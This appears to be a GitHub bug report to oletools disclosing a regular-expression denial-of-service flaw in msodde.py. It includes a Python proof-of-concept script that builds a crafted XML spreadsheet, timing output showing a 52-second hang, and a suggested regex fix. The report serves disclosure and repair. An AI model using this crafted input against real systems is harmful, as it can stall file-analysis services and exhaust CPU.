-
Notifications
You must be signed in to change notification settings - Fork 589
Description
Describe the bug
Hi team, thanks for your great work! I think I found a small vulnerability that might lead to DDoS in the system
At line 763 in msodde.py
the regex CSV_DDE_FORMAT = re.compile(r'\s*"?[=+-@](.+)\|(.+)!(.*)\s*')
is vulnerable to ReDoS when it is used in match = re.match(XML_DDE_FORMAT, formula)
To Reproduce
I have a test file here and can be run directly
pipe_count = 100000
formula_string = "=" + "|" * pipe_count +"\u0085\n\u0085\t\u0085ᄑ\u0085∢\u0085啕\u0085香"
xml_content = f'''<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet">
<Worksheet ss:Name="Sheet1">
<Table>
<Row>
<Cell ss:Formula="{formula_string}">
</Cell>
</Row>
</Table>
</Worksheet>
</Workbook>'''
file_name = "poc.xml"
try:
with open(file_name, 'w', encoding='utf-8') as f:
f.write(xml_content)
except IOError as e:
pass
We can run this to generate a poc.xml
When we run
time msodde poc.xml
The result is like this
real 0m52.501s
user 0m52.478s
sys 0m0.020s
As observed, processing complex or potentially malicious XML files can cause the system to hang for over 50 seconds. This delay could lead to DoS conditions or high CPU usage in real-world scenarios where oletools is used to parse malicious files.
Although such XMLs are uncommon in typical use, since oletools focuses on malware analysis, maybe it could be helpful to consider improvements to better handle these scenarios.🤔.
Expected behavior
I think we can add a limit like replace .+
with .{0,200}
or maybe divide the regex into multiple sub-regex? Maybe it can help to solve the recursion problem.
The core of the problem lies within (.+)\|(.+)
. The constructs like (.+) tend to eagerly match strings, leading to massive recursion and backtracking when faced with malicious input.
I tested a modification of the regex, and the performance improved significantly:
# after modify it to \s*"?[=+-@](.{0,200})\|(.{0,200})!(.*)\s*'
execution time: 0.000428 s